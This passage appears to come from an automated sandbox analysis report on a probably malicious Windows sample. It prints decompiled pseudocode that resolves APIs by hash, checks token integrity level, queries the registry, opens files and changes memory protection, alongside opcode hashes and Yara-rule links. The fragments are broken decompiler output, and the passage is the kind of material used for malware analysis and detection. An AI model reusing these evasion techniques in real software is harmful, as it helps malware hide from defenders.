Instruction Fuzzy Hash: 16E030B1209342AFDB09DA14CC14D7BB7E9EF84344F10881DB484CA150DB31DC509711

Uniqueness

Uniqueness Score: -1.00%

Function 10019B00, Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019B00() {
				intOrPtr* _t1;

				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1; // executed
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
			}

0x10019b00
0x10019b02
0x10019b04
0x10019b06
0x10019b08
0x10019b0a
0x10019b0c
0x10019b0e
0x10019b10
0x10019b12
0x10019b14
0x10019b16
0x10019b18
0x10019b1a
0x10019b1c
0x10019b1e
0x10019b20
0x10019b22
0x10019b24
0x10019b26
0x10019b28
0x10019b2a
0x10019b2c
0x10019b2e
0x10019b30
0x10019b32
0x10019b34
0x10019b36
0x10019b38
0x10019b3a
0x10019b3c
0x10019b3e
0x10019b40
0x10019b42
0x10019b44
0x10019b46
0x10019b48
0x10019b4a
0x10019b4c
0x10019b4e
0x10019b50
0x10019b52
0x10019b54
0x10019b56
0x10019b58
0x10019b5a
0x10019b5c
0x10019b5e
0x10019b60
0x10019b62
0x10019b64
0x10019b66
0x10019b68
0x10019b6a
0x10019b6c
0x10019b6e
0x10019b70
0x10019b72
0x10019b74
0x10019b76
0x10019b78
0x10019b7a
0x10019b7c
0x10019b7e
0x10019b80
0x10019b82
0x10019b84
0x10019b86
0x10019b88
0x10019b8a
0x10019b8c
0x10019b8e
0x10019b90
0x10019b92
0x10019b94
0x10019b96
0x10019b98
0x10019b9a
0x10019b9c
0x10019b9e
0x10019ba0
0x10019ba2
0x10019ba4
0x10019ba6
0x10019ba8
0x10019baa
0x10019bac
0x10019bae
0x10019bb0
0x10019bb2
0x10019bb4
0x10019bb6
0x10019bb8
0x10019bba
0x10019bbc
0x10019bbe
0x10019bc0
0x10019bc2
0x10019bc4
0x10019bc6
0x10019bc8
0x10019bca
0x10019bcc
0x10019bce
0x10019bd0
0x10019bd2
0x10019bd4
0x10019bd6
0x10019bd8
0x10019bda
0x10019bdc
0x10019bde
0x10019be0
0x10019be2
0x10019be4
0x10019be6
0x10019be8
0x10019bea
0x10019bec
0x10019bee

APIs

LdrInitializeThunk.NTDLL ref: 10019B0B

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00241007, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00241087
VirtualProtect.KERNELBASE ref: 0024111B

Strings

l, xrefs: 00241250

Memory Dump Source

Source File: 00000003.00000002.2362889137.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: l
API String ID: 544645111-2517025534
Opcode ID: 09c7ced6f2f116f1df1a9c84bab924ac8473771d4bda060b73c5e43cd8b19024
Instruction ID: abfee1a869699c24ced37b48bce63ac177de6c77eb3e5e42c30eb88e408a3dcb
Opcode Fuzzy Hash: 09c7ced6f2f116f1df1a9c84bab924ac8473771d4bda060b73c5e43cd8b19024
Instruction Fuzzy Hash: 4A719BB4D103288FDB14CF99C984A9DFBF1BF88710F11896AE849AB351D770A995CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00241159, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 002411E0

Strings

l, xrefs: 00241250

Memory Dump Source

Source File: 00000003.00000002.2362889137.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: l
API String ID: 544645111-2517025534
Opcode ID: 02e0c9809b0a9756e28a5c57b1efad66ef16654c5a12c7277c7923e70fda7751
Instruction ID: cec31e74e8ada81f97249bca7e2a5aa025e0ad3e7db4820825491433cf97c05f
Opcode Fuzzy Hash: 02e0c9809b0a9756e28a5c57b1efad66ef16654c5a12c7277c7923e70fda7751
Instruction Fuzzy Hash: 46418EB5D003288FDB20CF59C980689FBF6BF98314F1A859AD949AB311D371AD91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 100110C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E100110C8(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E1000C2C4(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E1000BB88(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E1000F5A8( &_v32, _t26);
						_t68 = E1000F4E0( &(_t74[3]), 0);
						if(E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
							L32:
							E1000F678( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E10013044(0x8b9d0da7, 0xc660b8b, 0x8b9d0da7, 0x8b9d0da7);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E10013044(0x8b9d0da7, 0x86f13b09, 0x8b9d0da7, 0x8b9d0da7);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E1000F678( &_v48);
						if(_v52 != 0) {
							E1000BB88(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x100110ca
0x100110d7
0x100110d9
0x100110e8
0x100110ec
0x100110f6
0x100110f6
0x100110fc
0x100110ff
0x10011101
0x1001110c
0x10011146
0x1001114b
0x10011150
0x10011150
0x00000000
0x1001110e
0x10011118
0x1001112b
0x1001113c
0x1001113c
0x1001113e
0x10011144
0x10011162
0x10011172
0x10011189
0x1001126b
0x1001126f
0x00000000
0x1001126f
0x1001119f
0x100111a3
0x00000000
0x00000000
0x100111b5
0x100111bc
0x00000000
0x00000000
0x100111c2
0x100111c4
0x100111c5
0x100111c6
0x100111ca
0x00000000
0x00000000
0x100111e1
0x100111e5
0x00000000
0x00000000
0x100111f2
0x100111f6
0x00000000
0x00000000
0x100111f8
0x100111fc
0x1001124b
0x100111fe
0x10011203
0x10011246
0x10011205
0x1001120a
0x10011241
0x1001120c
0x10011211
0x1001123c
0x10011213
0x10011218
0x10011237
0x1001121a
0x1001121f
0x10011232
0x10011221
0x10011223
0x1001122b
0x1001122b
0x1001121f
0x10011218
0x10011211
0x1001120a
0x10011203
0x10011250
0x1001125a
0x1001125f
0x1001125f
0x00000000
0x10011264
0x00000000
0x10011144

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 1001113C
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 1001119F

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 98c7e0325f073fd5abc016883e861445b9899dc392faa9e9509725fafc75b542
Instruction ID: 8c5f5d3ce6d356be6032d690ce8c8e8945ec782f3861e72cf728bb9d695556ab
Opcode Fuzzy Hash: 98c7e0325f073fd5abc016883e861445b9899dc392faa9e9509725fafc75b542
Instruction Fuzzy Hash: 19411574608342ABE759D6288C50BEFA6D9EB84780F10C428F980DF5E5DA74DCD5C391

Uniqueness

Uniqueness Score: -1.00%

Function 1001578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001578C(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E1001303C(0x8b9d0da7, 0xcaca77b9) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E1000F84C(_a8, _t15);
							if(E1001303C(0x8b9d0da7, 0xcaca77b9) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E1000F4E0(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x10015790
0x10015791
0x10015793
0x10015798
0x1001579f
0x100157a3
0x100157a3
0x100157a3
0x100157a7
0x100157ed
0x100157ed
0x100157a9
0x100157a9
0x100157af
0x100157b8
0x100157bb
0x100157d2
0x100157e3
0x100157e3
0x100157e5
0x100157eb
0x100157f6
0x1001580e
0x1001582e
0x1001582e
0x10015830
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100157af
0x10015838

APIs

RegQueryValueExA.KERNEL32(?,1001D1F8,00000000,?,00000000,00000000,?,?,?,1001D1F8,?,1001585F,?,00000000,00000000), ref: 100157E3
RegQueryValueExA.KERNEL32(?,1001D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,1001D1F8,?,1001585F,?,00000000), ref: 1001582E

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5df26e12db5cebbc3d1e6257a1e38f89b35e71e8d10c6080891d9e96bf3e0d9c
Instruction ID: cf6577e167f5e03e763c4f272f1cac72bcef4f618424ff398ab0e4057abf94dc
Opcode Fuzzy Hash: 5df26e12db5cebbc3d1e6257a1e38f89b35e71e8d10c6080891d9e96bf3e0d9c
Instruction Fuzzy Hash: 3E11D03020C306EBE650DA25EC82E6BBBDCEF85694F04841DB494DF182EA32EC40D671

Uniqueness

Uniqueness Score: -1.00%

Function 10015B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E10015B14(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E1000D210(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E1000D714(__ecx, _t60);
					E1000D03C(_t56,  *_t60);
					E1000D020(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E10016288(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E1001303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E1000C2B0(_t40);
					if(E1000C2C4(_t40) != 0) {
						_t56[2] = E100135C8(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E1001303C(0x10154545, 0x95343033);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E10013670(_t59, 0xff, 8);
						if(E1001303C(0x10154545, 0x5b739044) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x10015b1b
0x10015b1d
0x10015b2a
0x10015b2e
0x10015b32
0x10015b3c
0x10015b43
0x10015b43
0x10015b4a
0x10015b4c
0x10015b51
0x10015b5a
0x10015b62
0x10015b62
0x10015b53
0x10015b55
0x10015b55
0x10015b51
0x10015b67
0x10015b73
0x10015ca4
0x10015be1
0x10015bea
0x10015beb
0x10015bf0
0x10015bf1
0x10015be3
0x10015be5
0x10015be5
0x10015c07
0x10015c1b
0x10015c09
0x10015c16
0x10015c18
0x10015c18
0x10015c1d
0x10015c22
0x10015c30
0x10015c9b
0x00000000
0x10015c32
0x10015c37
0x10015c84
0x10015c86
0x10015c88
0x10015c92
0x10015c92
0x10015c88
0x10015c39
0x10015c45
0x10015c5e
0x10015c60
0x10015c61
0x10015c62
0x10015c64
0x10015c66
0x10015c67
0x10015c67
0x00000000
0x10015c6a
0x10015b79
0x10015b89
0x10015b89

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0df8daa9c29e72436fb3ec4abfa57638623548c1399657649b5d89dfb4f9884
Instruction ID: edaec4f2bb11baa141d3a1dd2a48fc8a8fcb6af86c8a36d362cf3de7f39ff6da
Opcode Fuzzy Hash: e0df8daa9c29e72436fb3ec4abfa57638623548c1399657649b5d89dfb4f9884
Instruction Fuzzy Hash: 5031E674348349EFE750EA718CC2F7F76D9EB85289F184429FA419E182DE32E9858261

Uniqueness

Uniqueness Score: -1.00%

Function 10015B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E10015B95(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E1001303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E1000C2B0(_t24);
				if(E1000C2C4(_t24) != 0) {
					_t34[2] = E100135C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E1001303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E10013670(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E1001303C(0x10154545, 0x5b739044) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x10015b95
0x10015b99
0x10015b9c
0x10015b9f
0x10015be1
0x10015bea
0x10015bf0
0x10015bf1
0x10015be3
0x10015be5
0x10015be5
0x10015c07
0x10015c1b
0x10015c09
0x10015c16
0x10015c18
0x10015c18
0x10015c1d
0x10015c22
0x10015c30
0x10015c9b
0x10015c9e
0x10015c32
0x10015c37
0x10015c84
0x10015c88
0x10015c92
0x10015c92
0x10015c88
0x10015c39
0x10015c45
0x10015c4a
0x10015c5e
0x10015c60
0x10015c61
0x10015c62
0x10015c64
0x10015c66
0x10015c67
0x10015c67
0x10015c6a
0x10015c6a
0x10015c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 10015C16

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction ID: b575d5e3e90daca5c9d34100f19c500d14ad901aa15c92094685451fc0e26933
Opcode Fuzzy Hash: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction Fuzzy Hash: 5901F57538434AFFF660AA615C82F7B73CDDF8229AF198425BA015E182DE37DCC58161

Uniqueness

Uniqueness Score: -1.00%

Function 10015BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E10015BBD(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E1001303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E1000C2B0(_t24);
					if(E1000C2C4(_t24) != 0) {
						_t33[2] = E100135C8(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E1001303C(0x10154545, 0x95343033);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E10013670(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E1001303C(0x10154545, 0x5b739044) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x10015bbd
0x10015bbf
0x10015bd6
0x10015be1
0x10015bea
0x10015bf0
0x10015bf1
0x10015be3
0x10015be5
0x10015be5
0x10015c07
0x10015c1b
0x10015c09
0x10015c16
0x10015c18
0x10015c18
0x10015c1d
0x10015c22
0x10015c30
0x10015c9b
0x10015c9e
0x10015c32
0x10015c37
0x10015c84
0x10015c88
0x10015c92
0x10015c92
0x10015c88
0x10015c39
0x10015c45
0x10015c4a
0x10015c5e
0x10015c60
0x10015c61
0x10015c62
0x10015c64
0x10015c66
0x10015c67
0x10015c67
0x10015c6a
0x10015c6a
0x10015bc1
0x10015bc1
0x10015bc8
0x10015bc8
0x10015c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 10015C16

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction ID: d32bd6a9efcb34eb93927500f93fca8ef299acc014fd83b0e5606e3353f434ac
Opcode Fuzzy Hash: af98b8f18d4404483ce410ac0791fe4c6811433ebfb8a47cf56fbae2f89ab8d8
Instruction Fuzzy Hash: AF01267438434AFFF660DA608CC2F7B7389DB4118AF184425FA114E142DB37E9D881A0

Uniqueness

Uniqueness Score: -1.00%

Function 10015BA9, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E10015BA9(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E1001303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E1000C2B0(_t24);
				if(E1000C2C4(_t24) != 0) {
					_t34[2] = E100135C8(0xc0000000);
